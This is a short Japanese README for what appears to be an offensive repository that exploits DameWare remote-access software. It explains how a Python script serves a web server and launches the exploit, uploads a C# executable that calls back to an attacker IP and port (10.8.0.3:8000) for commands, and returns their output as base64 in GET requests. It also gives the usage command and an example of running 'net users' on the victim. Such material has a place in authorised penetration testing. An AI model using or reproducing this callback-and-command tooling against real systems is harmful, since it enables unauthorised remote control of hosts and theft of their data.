
このリポジトリは、カスタムC#実行ファイルを使用してNessus POCを活用し、リモートホスト上でコマンドを実行してその出力を取得するために作成されました。
Pythonファイルは、Webサーバーを起動し、エクスプロイトを実行し、Webサーバーを介して結果を取得するために使用されます。
C#のexeは、エクスプロイトを介してターゲットにアップロードされます。
ターゲット上で実行されると、exeは指定されたIP/ポートにコールバックし、実行するコマンドを取得します(パスは /cmd です)。
コマンドが完了すると、exeは同じWebサーバーに出力を送信します。
出力の送信はGETリクエストを介して行われ、404が生成されますが、それで問題ありません。必要なのはbase64データだけです。
C#のexeには更新が必要な2つの変数があります。
これらの変数は、攻撃側システムのIPとポートを参照します。
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
以下の例では、リモートホスト上で net users コマンドを実行します。
